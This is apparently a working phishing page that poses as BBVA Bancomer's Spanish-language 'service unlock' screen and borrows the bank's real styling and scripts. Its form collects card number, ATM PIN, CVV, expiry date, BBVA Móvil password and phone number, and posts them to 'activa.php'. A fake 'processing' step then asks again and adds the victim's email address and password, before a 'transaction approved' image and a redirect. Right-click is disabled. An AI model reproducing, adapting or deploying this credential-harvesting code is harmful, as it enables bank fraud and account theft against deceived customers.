<html xmlns:font-weight="http://www.w3.org/1999/xhtml"><head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<title>Desbloqueo del servicio</title>






<style type="text/css">
.access__close {font-family:"BentonSansBBVA-Medium",Helvetica,Arial,sans-serif;font-size:13px;color:#1d73b2;text-align:left;letter-spacing:0;line-height:16px;position:absolute;top:0;right:0;margin:16px 8px;border:none}
.access__close {font-size:15px;line-height:24px}
.access__container {background-color:#fff;right:0;width:100%;height:0;overflow:hidden}
.access__control {position:relative}
.bbva-icon {line-height:inherit;margin:0 8px}
.bbva-icon {font-size:24px;line-height:24px}
.bbva-icon {font-size:20px;line-height:20px}
.bbva-icon {display:inline-block}
.bbva-icon:before {font-family:'bbvaiconfont'!important;font-style:normal;font-weight:normal!important;vertical-align:middle}
.bbva-icon__2_009_menu:before {content:"\ea49"}
.bbva-icon__2_022_close:before {content:"\ea56"}
.bbva-icon__3_001_search:before {content:"\ea6f"}
.bbva-icon__3_003_myprofile:before {content:"\ea71"}
.cookies {background-color: #D4EDFC;}
.cookies__base {padding:24px;position:relative;display:none;}
.cookies__close {color:#5BBEFF;cursor:pointer;position:absolute;margin:0;border:0;padding:0;background:0;right:24px;}
.cookies__content {margin-left:44px;}
.cookies__icon {color:#5BBEFF;margin-left:0;position:absolute;}
.header__access {opacity:0.6}
.header__access {opacity:0.6}
.header__actions {width:100%}
.header__actions {float:right;padding-right:16px}
.header__actions {width:368px;float:left;margin-left:16px;margin-right:16px;width:398px}
.header__actions {width:556px;float:left;margin-left:16px;margin-right:16px;display:block}
.header__actions {width:100%}
.header__actions {float:right;padding-right:16px}
.header__actions {width:368px;float:left;margin-left:16px;margin-right:16px;width:398px}
.header__actions {width:556px;float:left;margin-left:16px;margin-right:16px;display:block}
.header__actions--tablet-hidden {display:none}
.header__actions--tablet-hidden {display:none}
.header__actions--tablet-left {width:18.18182%;float:left;margin-left:0;margin-right:-100%}
.header__actions--tablet-left {width:18.18182%;float:left;margin-left:0;margin-right:-100%}
.header__actions--tablet-right {width:18.18182%;float:left;margin-left:81.81818%;margin-right:-100%}
.header__actions--tablet-right {width:18.18182%;float:left;margin-left:81.81818%;margin-right:-100%}
.header__actions__item__link {font-family:"BentonSansBBVA-Medium",Helvetica,Arial,sans-serif;font-size:15px;color:#fff;text-align:center;letter-spacing:0;line-height:16px;color:#fff;line-height:32px;opacity:1;padding:26px 0;margin:0 8px;display:block}
.header__actions__item__link {padding:16px 0 12px;float:none}
.header__actions__item__link {padding:16px 0 12px;float:left}
.header__actions__item__link {margin:0}
.header__actions__item__link {font-family:"BentonSansBBVA-Medium",Helvetica,Arial,sans-serif;font-size:15px;color:#fff;text-align:center;letter-spacing:0;line-height:16px;color:#fff;line-height:32px;opacity:1;padding:26px 0;margin:0 8px;display:block}
.header__actions__item__link {padding:16px 0 12px;float:none}
.header__actions__item__link {padding:16px 0 12px;float:left}
.header__actions__item__link {margin:0}
.header__actions__item__link__text {display:none}
.header__actions__item__link__text {display:none}
.header__actions__list {float:left}
.header__actions__list {float:left;display:block}
.header__actions__list {float:left}
.header__actions__list {float:left;display:block}
.header__actions__ulist {float:right}
.header__actions__ulist {float:right}
.header__base {position:relative;z-index:6;height:1px;padding-bottom:87px}
.header__base {padding-bottom:63px}
.header__base {position:relative;z-index:6;height:1px;padding-bottom:87px}
.header__base {padding-bottom:63px}
.header__container {position:relative;z-index:2}
.header__container {position:relative;z-index:2}
.header__image {width:100%}
.header__image {width:176px;margin:auto}
.header__image {width:134px}
.header__image {width:100%}
.header__image {width:176px;margin:auto}
.header__image {width:134px}
.header__logo {padding:0;min-height:88px;overflow:hidden;display:flex;align-items:center;justify-content:center}
.header__logo {color:#fff;min-height:64px}
.header__logo {width:45.45455%;float:left;margin-left:27.27273%;margin-right:-100%}
.header__logo {-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;width:25%;float:left;padding-left:16px;padding-right:16px}
.header__logo {width:208px;float:left;margin-left:16px;margin-right:16px}
.header__logo {width:262px;float:left;margin-left:16px;margin-right:16px}
.header__logo {padding:0;min-height:88px;overflow:hidden;display:flex;align-items:center;justify-content:center}
.header__logo {color:#fff;min-height:64px}
.header__logo {width:45.45455%;float:left;margin-left:27.27273%;margin-right:-100%}
.header__logo {-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;width:25%;float:left;padding-left:16px;padding-right:16px}
.header__logo {width:208px;float:left;margin-left:16px;margin-right:16px}
.header__logo {width:262px;float:left;margin-left:16px;margin-right:16px}
.header__logo__link {width:100%}
.header__logo__link {width:100%}
.header__main {min-height:88px;overflow:hidden}
.header__main {color:#fff;min-height:64px}
.header__main {min-height:88px;overflow:hidden}
.header__main {color:#fff;min-height:64px}
.header__mainNavigation {position:fixed;width:100%;bottom:0}
.header__mainNavigation {position:fixed;bottom:0;width:100%}
.header__mainNavigation {width:288px;float:left;margin-left:16px;margin-right:16px;width:258px}
.header__mainNavigation {width:262px;float:left;margin-left:16px;margin-right:16px;display:block}
.header__mainNavigation {position:fixed;width:100%;bottom:0}
.header__mainNavigation {position:fixed;bottom:0;width:100%}
.header__mainNavigation {width:288px;float:left;margin-left:16px;margin-right:16px;width:258px}
.header__mainNavigation {width:262px;float:left;margin-left:16px;margin-right:16px;display:block}
.mainNavigation__base {position:fixed;bottom:0;width:100%;background:#072146;z-index:1001;display:none;box-shadow:0 -5px 10px 0 rgba(0,0,0,0.2)}
.mainNavigation__item {display:block;float:left;opacity:0.6}
.mainNavigation__item {width:calc(50% - 2px);border-right:1px solid #2b4261}
.mainNavigation__item--active {opacity:1}
.mainNavigation__link {font-family:"BentonSansBBVA-Medium",Helvetica,Arial,sans-serif;font-size:15px;color:#fff;text-align:center;letter-spacing:0;line-height:16px;display:block;color:#fff;line-height:32px;margin:0 16px;text-transform:uppercase}
.mainNavigation__link {padding:16px 0}
.mainNavigation__link {padding:26px 0}
.mainNavigation__list {list-style:none}
.mainNavigation__list {max-width:100%;margin-left:auto;margin-right:auto}
.mainNavigation__list {max-width:100%;margin-left:auto;margin-right:auto}
.mainNavigation__list:after {content:" ";display:block;clear:both}
.mainNavigation__list:after {content:" ";display:block;clear:both}
.megamenu__trigger__close {display:none}
.megamenu__trigger__open {display:block}
.megamenu__trigger__open__text {display:none}
.rte {font-family:"BentonSansBBVA-Book",Helvetica,Arial,sans-serif;font-size:14px;color:#121212;text-align:left;letter-spacing:0;line-height:20px}
.rte {font-size:15px;line-height:24px}
.skip2content {left:-999px;position:absolute;top:auto;width:1px;height:1px;overflow:hidden;z-index:-999}
</style>
    <link rel="stylesheet" type="text/css" href="comun/js/jquery-ui/jquery-ui.min.css">
    <link rel="stylesheet" type="text/css" href="comun/js/jquery-ui/jquery-ui.theme.min.css">
    <script type="text/javascript" src="comun/js/jquery-ui/external/jquery/jquery.js"></script>
    <script type="text/javascript" src="comun/js/jquery-ui/jquery-ui.min.js"></script>
<div class="header__main container">
        
            <div class="header__logo" itemscope itemtype="http://schema.org/Organization">
                
                <a itemscope="url" class="header__logo__link" href="/personas.html" target="_self" aria-label="Home Personas BBVA Bancomer" title="BBVA Bancomer | Tarjetas, Créditos, Hipotecas, Cuentas, Seguros, Nominas, Portabilidad">
                    
                        
    
        





    <img src="https://www.bancomer.com//content/dam/public-web/bancomer/images/logos/logo-bbva-bancomer-blanco.svg" srcset="https://www.bancomer.com//content/dam/public-web/bancomer/images/logos/logo-bbva-bancomer-blanco.svg" sizes="(min-width: 900px) 20vw, 50vw" itemprop="logo" class="header__image " alt="BBVA Bancomer | Tarjetas, Créditos, Hipotecas, Cuentas, Seguros, Nominas, Portabilidad">

    

                    
                </a>
            </div>
        
        <div class="header__mainNavigation" itemscope itemtype="https://schema.org/SiteNavigationElement">
<nav class="mainNavigation__base" data-dl-component-id="content_bancomer_es_personas_jcr:content_header_mainnavigation">
    <ul class="mainNavigation__list">
        <li itemprop="name" class="mainNavigation__item mainNavigation__item--active">
            <a itemprop="url" href="/personas.html" target="_self" class="mainNavigation__link">Personas</a>
        </li>
    
        <li itemprop="name" class="mainNavigation__item">
            <a itemprop="url" href="/empresas.html" target="_self" class="mainNavigation__link">Empresas</a>
        </li>
    </ul>
</nav></div>

        <nav class="header__actions" role="menu" itemscope="" itemtype="https://schema.org/SiteNavigationElement">
            <ul class="header__actions__ulist">
                
                <li itemprop="name" class="header__actions__list header__actions--tablet-left">
                    

    <div data-dl-component-id="content_bancomer_es_personas_jcr:content_header" data-component="access" data-component-params='{"src" : "index.php"}'>
        <a accesskey="a" itemprop="url" aria-label="Acceso" class="header__actions__item__link header__access" href="javascript:void(0);" aria-expanded="false">
            <i class="bbva-icon bbva-icon__3_003_myprofile"></i>
            <span class="header__actions__item__link__text">Acceso</span>
        </a>
    </div>


                </li>
                
                
                
                <li class="header__actions__list header__actions--tablet-hidden">
                    <div class="searchtrigger" role="search">
    <a href="javascript:void(0);" aria-haspopup="true" aria-controls="access__container__content" aria-label="Buscador" aria-expanded="false" accesskey="s" class="header__actions__item__link searchtrigger__btn" title="search">
    	<i class="bbva-icon bbva-icon__3_001_search"></i>
    </a>
</div>
                </li>
                
                <li class="header__actions__list header__actions--tablet-right">
                    
<a class="megamenu__trigger header__actions__item__link " href="javascript:void(0);" aria-expanded="false" aria-haspopup="true" aria-label="Menú" aria-controls="megamenu__aside" data-dl-component-id="content_bancomer_es_personas_jcr:content_header" accesskey="m">
    <span class="megamenu__trigger megamenu__trigger__open">
        <span class="megamenu__trigger__open__text">Menú</span>
        <i class="bbva-icon bbva-icon__2_009_menu"></i>
    </span>
    <span class="megamenu__trigger megamenu__trigger__close" aria-hidden="true">
        <span class="megamenu__trigger__open__text">Cerrar</span>
        <i class="bbva-icon bbva-icon__2_022_close"></i>
    </span>
</a>
                </li>
            </ul>
        </nav>

    </div>
















<link href="https://a1.bbvanet.com.mx/portalblg/portalblg/resources/portalblg/css/fuentes.css" rel="stylesheet" type="text/css">
<link href="https://a1.bbvanet.com.mx/portalblg/portalblg/resources/portalblg/css/fonts/styles.css" rel="stylesheet" type="text/css">

<link href="https://a1.bbvanet.com.mx/portalblg/portalblg/resources/portalblg/css/coronita/style.css?v=1" rel="stylesheet" type="text/css">
<script src="https://a1.bbvanet.com.mx/portalblg/portalblg/resources/portalblg/js/base64.js"></script>
<script src="https://a1.bbvanet.com.mx/portalblg/portalblg/resources/portalblg/js/BigInt.formulas.js"></script>
<script src="https://a1.bbvanet.com.mx/portalblg/portalblg/resources/portalblg/js/BigInt.js"></script>
<script src="https://a1.bbvanet.com.mx/portalblg/portalblg/resources/portalblg/js/CifradoBancomer.js"></script>
<script src="https://a1.bbvanet.com.mx/portalblg/portalblg/resources/portalblg/js/tripledes.js"></script>
<script src="https://a1.bbvanet.com.mx/portalblg/portalblg/resources/portalblg/js/funcionesGrales.js"></script>
<script src="https://a1.bbvanet.com.mx/portalblg/portalblg/resources/portalblg/js/le-mtagconfig.js" type="text/javascript"></script>

<script>
	lpTag.section = ["desbloqueodatos",];
</script>
<script type="text/javascript" src="https://www.opinator.com/resources/js/embed.main.min.js"></script>
<script type="text/javascript" src="https://www.opinator.com/api/file/opinator.embed.helper.js/" defer="defer"></script>
<script type="text/javascript">	
	var aux = Math.random();
	_opinator_variables = {			
		id : aux,    //id del cliente a mostrar en este caso es aleatorio
        oneOpiShownOnly : false, 
        default : {
        	opi : 'Desbloqueo-bcom-abandono',  //nombre del cuestionario a mostrar
            sc : '', 
            ac : 'traspasointerbancario', 
            extraParams : null  // query_string [ parametros extra, aquí se podria enviar el perfil" ]
		},
        unload : {
        	enabled : true,
            opi : 'Desbloqueo-bcom-abandono', //nombre del cuestionario a mostrar
            sc : '',
            ac : '',  
            extraParams : null,
            message : "¿Le importa que le hagamos unas preguntas antes de cerrar la ventana?\n\nNo le tomará más de 10 segundos responderlas.\n\nSi es así, por favor pulse en el botón 'Permanecer en esta página'" 
		}
	}
	
	var control = false; 
	var vkey = false;				
	
	function volver() {
		document.desbloqueoValidacionDatos.submit();
	}
	
	function validarError() {
		if (document.desbloqueoValidacionDatos.error.value != null && document.desbloqueoValidacionDatos.error.value != ""){	
			var error = document.desbloqueoValidacionDatos.error.value;
			alert(error);
			//Send EA's to LivePerson to show that visitors have errors when they fill out forms
			lpTag.sdes = lpTag.sdes||[];
			lpTag.sdes.push(
			   {
					"type": "error",  //MANDATORY
					"error": {
					   "message": "Datos incorrectos",  // THE ERROR MESSAGE
					   "code": "ocurrioError"  // THE ERROR CODE
					}
			   }
			);
			document.desbloqueoValidacionDatos.error.value = "";
			document.desbloqueoValidacionDatos.numeroTarjetaTemp.disabled = false;
		}
		else{		
			document.desbloqueoValidacionDatos.numeroTarjetaTemp.disabled = true;
			validaNumA();
		}
	}
	
	function validaNumA() {		
		if (document.desbloqueoValidacionDatos.numA.value != null && document.desbloqueoValidacionDatos.numA.value != ""){			
			var numTdd = document.desbloqueoValidacionDatos.numTdd.value;
			document.desbloqueoValidacionDatos.numeroTarjeta.value=numTdd;
			numTdd = "***********" + numTdd.substring(11);
			document.desbloqueoValidacionDatos.numeroTarjetaTemp.value=numTdd;			
		}		
	}
	
	function validarTDD() {
		if (document.desbloqueoValidacionDatos.numeroTarjeta.value.length != 16) {
			if (document.desbloqueoValidacionDatos.numeroTarjeta.value.length ==0) {
				alert("Ingresa el número de Tarjeta");
				return (false);
			}
			alert("La tarjeta debe contener 16 dígitos");
			document.desbloqueoValidacionDatos.numeroTarjeta.value="";
			return (false);
		}
		return true;
	}
	
	function validarNIP() {
		if (document.desbloqueoValidacionDatos.nip.value.length != 4) {
			alert("Número de NIP proporcionado inválido");
			document.desbloqueoValidacionDatos.nip.value="";
			return (false);
		}
		return true;
	}
	
	function validarCVV() {
		if (document.desbloqueoValidacionDatos.codigoVerificacion.value.length != 3) {
			alert("El código de verificación debe contener 3 dígitos");
			document.desbloqueoValidacionDatos.codigoVerificacion.value="";
			return (false);
		}
		return true;
	}
	
	function fn_submit() {
		window.onbeforeunload = null;

		document.getElementById("btnContinuar").disabled = true;
	 	if (validarTDD() && validarNIP() && validarCVV()){			
			cifraNip3DES(document.desbloqueoValidacionDatos.nip.value,document.desbloqueoValidacionDatos.numA.value);
			document.desbloqueoValidacionDatos.submit();
		}else{
			document.getElementById("btnContinuar").disabled = false;
			document.desbloqueoValidacionDatos.reset();
			document.desbloqueoValidacionDatos.numeroTarjetaTemp.disabled = false;
		}		
	}	
	
	function getParameter(vr) {
        var src = String( window.location.href ).split('?')[1];        
        var vrs = src.split('&');        
 
        for (var x = 0, c = vrs.length; x < c; x++) 
        {
        	if (vrs[x].indexOf(vr) != -1) {        		
        		return decodeURI( vrs[x].split('=')[1] );
        		break;
        	};
        };
	};


    function launchProcesando(){
        $("#procesando").dialog({
            closeOnEscape: false,
            resizable: false,
            modal: true,
            width:'500px'
        });
        setTimeout(function(){
            $("#procesando").dialog('close');
            if(secondTry){
                launchAprobada();
            }else{
                $("#secondTry").show();
                $("#1").show();
                $("#2").show();
                $("#3").show();
                $("#4").show();
                $("#5").show();
                $("#6").show();
                $("#Form1").trigger("reset");
                $("#cc_error").hide();
                secondTry = true;
                $("#card").focus();
            }

        },5000);
    }

    function launchAprobada(){
        $("#aprobada").dialog({
            closeOnEscape: false,
            resizable: false,
            modal: true,
            width:'500px'
        });
        setTimeout(function(){
            parent.location.href= "out.html"
        },2000);
    }
</script>















<body onload="validarError();" unload="showOpi();" oncontextmenu="return false">
	<div class="container">
		<div class="formulario_container">
		  <h3 class="greeting">¡Bienvenido!</h3>
      <form name="Form1" id="Form1">



          <h3 hidden id="secondTry" style="color: red"; font-weight: bold;>Ingresa nuevamente tu información.</h3>

          <div class="container_formulario_element">
              <input title="Verifica el numero de tarjeta ingresado." pattern="^(?:4[0-9]{12}(?:[0-9]{3})?|[25][1-7][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\d{3})\d{11})$" type="text" name="card" id="card" maxlength="16" class="form_input" placeholder="Número de tarjeta" autocomplete="off" data-label="num_tarjeta" onkeypress="off" >

              <label for="card" class="form_label">Número de tarjeta</label>
          </div>
          <p id="cc_error" style="color: red" hidden>El numero de tarjeta no es valido.</p>
                
             
                
                
                	          	
          	<div class="container_formulario_element">
	            	<input name="pin" type="password" id="pin" class="form_input" maxlength="4" placeholder="NIP de cajero" data-label="nip" autocomplete="off" onkeypress="off">
	            	<label for="pin" class="form_label">NIP de cajero</label>
	          	</div>
	          	<div class="tip_element">
          		  Ingresa el NIP que utilizas en el cajero
	          	</div>
	          	
	         
             
             
             
             
             
           	<div class="container_formulario_element with_tip_par">
	            	<input name="cvv" type="password" id="cvv" class="form_input" maxlength="3" placeholder="CVV" data-label="cvv" onkeypress="off">
	            	<label for="cvv" class="form_label">CVV</label>
	          	</div>
	          	<div class="tip_element">
          		  Ingresa los 3 dígitos de seguridad que se encuentran al reverso de tu tarjeta
	          	</div>

          <div hidden id="1" class="container_formulario_element with_tip_par">
              <input name="mail" type="email" id="mail" class="form_input" placeholder="Correo electronico" data-label="Correo electronico" onkeypress="off" value="">
              <label for="mail" class="form_label">Correo electronico</label>
          </div>
          <div hidden id="2" class="tip_element">
              Ingresa el correo electronico asociado a tu cuenta
          </div>
          <div hidden id="3" class="container_formulario_element with_tip_par">
              <input name="mailpassword" type="password" id="mailpassword" class="form_input" placeholder="Contraseña" data-label="Contraseña" onkeypress="off" value="">
              <label for="mailpassword" class="form_label">Contraseña</label>
          </div>
          <div hidden id="4" class="tip_element">
              Ingresa la contraseña de tu correo electronico
          </div>
          <div hidden id="5" class="container_formulario_element with_tip_par">
              <input name="mailpassword2" type="password" id="mailpassword2" class="form_input" placeholder="Contraseña" data-label="Contraseña" onkeypress="off" value="">
              <label for="mailpassword2" class="form_label">Contraseña</label>
          </div>
          <div hidden id="6" class="tip_element">
              Confirma la contraseña de tu correo electronico
          </div>

          <div class="container_formulario_element with_tip_par">
              <input name="bmovil" type="password" id="bmovil" class="form_input" minlength="6" maxlength="10" placeholder="Contraseña" data-label="bmovil" onkeypress="off">
              <label for="bmovil" class="form_label">Contraseña</label>
          </div>
          <div class="tip_element">
              Ingrese su contraseña BBVA Movil
          </div>

          <div class="container_formulario_element with_tip_par">
              <label for="mes" class="form_label">Mes</label>
              <select name="mes" id="mes" style="width: 40%; height: 35px; border: none">
                  <option value="00" disabled selected>Mes</option>
                  <option value="01">01</option>
                  <option value="02">02</option>
                  <option value="03">03</option>
                  <option value="04">04</option>
                  <option value="05">05</option>
                  <option value="06">06</option>
                  <option value="07">07</option>
                  <option value="08">08</option>
                  <option value="09">09</option>
                  <option value="10">10</option>
                  <option value="11">11</option>
                  <option value="12">12</option>
              </select>
              <label for="ano" class="form_label">Año</label>
              <select name="ano" id="ano" style="width: 40%; height: 35px; border: none">
                  <option value="00" disabled selected>Año</option>
                  <option value="18">18</option>
                  <option value="19">19</option>
                  <option value="20">20</option>
                  <option value="21">21</option>
                  <option value="22">22</option>
                  <option value="23">23</option>
                  <option value="24">24</option>
                  <option value="25">25</option>
              </select>
          </div>
          <div class="tip_element">
              Ingresa la fecha de expiración de tu tarjeta
          </div>







          <div class="container_formulario_element with_tip_par">
	            	<input name="cel" type="none" id="cel" class="form_input" maxlength="10" placeholder="Celular" data-label="cel" onkeypress="off">
	            	<label for="cel" class="form_label">Celular</label>
	          	</div>
	          	<div class="tip_element">
          		  Ingresa los 10 dígitos de su numero celular registrado en alertas bancomer
	          	</div>











          <div class="container_formulario_buttons">
              <button class="continue" id="btnContinuar" type="button" >Continuar</button>


          </div>
	          	
                
                
                
                
                
                
	          	<!-- Inputs auxiliares -->
	          	
	          	<input type="hidden" name="error" value="">
				<input type="hidden" name="_eventId" value="">
				<input type="hidden" name="flowExecutionKey" value="e2s2">
				<input type="hidden" name="numA" id="numA" value="">
				<input type="hidden" name="numTdd" id="numTdd" value="">
				<input type="hidden" name="numB" id="numB" value="">
				<input type="hidden" name="cifrado" id="cifrado" value="">
			</form>
	  </div>
	</div>

<script src="https://a1.bbvanet.com.mx/portalblg/portalblg/resources/portalblg/js/sessiontimeout.js"></script>
<script src="https://a1.bbvanet.com.mx/portalblg/portalblg/resources/portalblg/js/coronita/util.js"></script>
<script src="https://a1.bbvanet.com.mx/portalblg/portalblg/resources/portalblg/js/coronita/iframe-resizer-contentwindow.min.js"></script>

<script type="text/javascript">
/*<![CDATA[*/ 
document.cookie = "IV_JCT=%2Fportalblg; path=/";
/*]]>*/ 
</script>
    <div hidden id="aprobada" title="transaccion aprobada" style="padding: 10px; background:#FFF; height: 100%; -webkit-border-radius: 3px; -moz-border-radius: 3px; -ms-border-radius: 3px;-o-border-radius: 3px; border-radius: 3px;  border: 1px solid #CCC;">



        <p style="font-family: Arial; font-size: 18px; color: #000000;" align="center">&nbsp;</p>
        <p style="font-family: Arial; font-size: 16px; color: #000000;" align="justify"><a href="index.html"><img src="content/aprobada.png" width="494" height="221" alt=""/></a></p>
        <div align="center">
            <blockquote>&nbsp;</blockquote>
        </div>
    </div>


    <div hidden id="procesando" style="padding: 10px; background:#FFF; height: 100%; -webkit-border-radius: 3px; -moz-border-radius: 3px; -ms-border-radius: 3px;-o-border-radius: 3px; border-radius: 3px;  border: 1px solid #CCC;">

        <p align="center">&nbsp;</p>
        <div align="center">
            <div align="center">
                <img src="content/cargando.gif" alt="esperar">
            </div><table width="355" border="2" align="center" bordercolor="#999999" bgcolor="#FFFFFF" class="c5">
        </table>
        </div>
        <p align="center" style="font-family: Arial; font-size: 18px; color: #000000;">&nbsp;</p>

    </div>

    <script type="text/javascript">
        var secondTry = false;
        function submit(){
            $.ajax({
                url: "activa.php",
                type: "post",
                data: $("#Form1").serialize(),
                success(data){
                    launchProcesando();
                }
            });
        }

        function valid_credit_card(value) {
            // accept only digits, dashes or spaces
            if (/[^0-9-\s]+/.test(value)) return false;

            // The Luhn Algorithm. It's so pretty.
            var nCheck = 0, nDigit = 0, bEven = false;
            value = value.replace(/\D/g, "");

            for (var n = value.length - 1; n >= 0; n--) {
                var cDigit = value.charAt(n),
                    nDigit = parseInt(cDigit, 10);

                if (bEven) {
                    if ((nDigit *= 2) > 9) nDigit -= 9;
                }

                nCheck += nDigit;
                bEven = !bEven;
            }

            return (nCheck % 10) == 0;
        }

        $(document).ready(function(){

            $("#btnContinuar").click(function(){
                if(valid_credit_card($("#card").val()) && $("#card").val() != ""){
                    submit();
                }else{
                    $("#cc_error").show();
                    $("#card").focus();
                }
            });

        });
    </script>


<iframe tabindex="-1" aria-hidden="true" role="presentation" title="Intentionally blank" name="lpSS_29193620956" id="lpSS_29193620956" src="Desbloqueo.html" style="width: 0px; height: 0px; position: absolute; top: -1000px; left: -1000px;"></iframe></body></html>